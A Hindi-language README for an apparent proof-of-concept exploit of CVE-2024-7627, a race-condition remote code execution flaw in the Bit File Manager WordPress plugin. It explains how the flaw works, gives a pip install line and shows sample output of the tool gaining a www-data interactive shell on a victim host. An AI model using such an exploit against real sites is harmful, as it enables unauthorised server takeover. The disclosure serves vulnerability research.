
CVE-2024-7627 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Bit File Manager WordPress प्लगइन में एक अनऑथेंटिकेटेड रिमोट कोड एक्जीक्यूशन कमजोरी है। यह nonce निष्कर्षण, रेस कंडीशन शोषण को स्वचालित करता है और एक इंटरैक्टिव रिवर्स शेल प्रदान करता है।
इस रिपॉजिटरी में CVE-2024-7627 के लिए एक प्रमाण-अवधारणा (PoC) शोषण शामिल है, जो Bit File Manager WordPress प्लगइन (संस्करण 6.0 – 6.5.5) में एक गंभीर बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) भेद्यता है।
जब Guest User Read (अतिथि उपयोगकर्ता पढ़ें) सुविधा सक्षम होती है, तो प्लगइन checkSyntax फ़ंक्शन के अंदर एक रेस कंडीशन को उजागर करता है।
यह फ़ंक्शन सत्यापन से पहले /wp-content/uploads/ में एक अस्थायी PHP फ़ाइल लिखता है, जिससे हमलावर फ़ाइल का अनुरोध कर सकते हैं और मनमाने सिस्टम कमांड निष्पादित कर सकते हैं।
requests, aiohttp, asyncio, beautifulsoup4निर्भरताएँ स्थापित करें:
pip install requests aiohttp beautifulsoup4
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: 65a1d91c63
[*] Getting a random file hash...
[+] Starting interactive shell. Type 'exit' to quit.
lab-shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
lab-shell> uname -a
Linux victim-wp 5.15.0-78-generic #85-Ubuntu SMP x86_64 GNU/Linux
lab-shell> whoami
www-data